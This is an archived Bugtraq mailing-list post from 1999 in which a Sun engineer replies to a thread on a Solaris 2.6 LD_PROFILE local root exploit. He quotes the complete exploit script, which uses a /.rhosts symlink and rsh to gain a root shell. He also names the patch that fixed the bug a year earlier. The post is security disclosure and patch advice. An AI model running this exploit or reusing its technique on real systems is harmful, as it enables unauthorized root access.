Bugtraq mailing list archives

Re: LD_PROFILE local root exploit for solaris 2.6

From: darren.moffat () SUNUK UK SUN COM (Darren Moffat - Solaris Sustaining Engineering)
Date: Fri, 24 Sep 1999 10:00:46 +0100

works on solaris 2.6 sparc anyway...

#! /bin/ksh
#  LD_PROFILE local root exploit for solaris
#  steve () tightrope demon co uk 19990922
umask 000
ln -s /.rhosts /var/tmp/ps.profile
export LD_PROFILE=/usr/bin/ps
/usr/bin/ps
echo + + >  /.rhosts
rsh -l root localhost csh -i


This was bug# 4150646/1241843 which is fixed in patch 105490-05 (or higher),
which was released over 1 year ago (Sep/10/98)!

Patch 105490-07 is in the current recommened patch set for Solaris 2.6,
so it is publicly available.

I strongly recommend that people apply the latest recommended and security
patch sets when testing out security exploits.  That way you won't send
out information about exploits which have been long fixed and needlessly
panic people.

--
Darren J Moffat

Current thread:

Re: LD_PROFILE local root exploit for solaris 2.6 Darren Moffat - Solaris Sustaining Engineering (Sep 24)
- Re: LD_PROFILE local root exploit for solaris 2.6 Valdis.Kletnieks () VT EDU (Sep 26)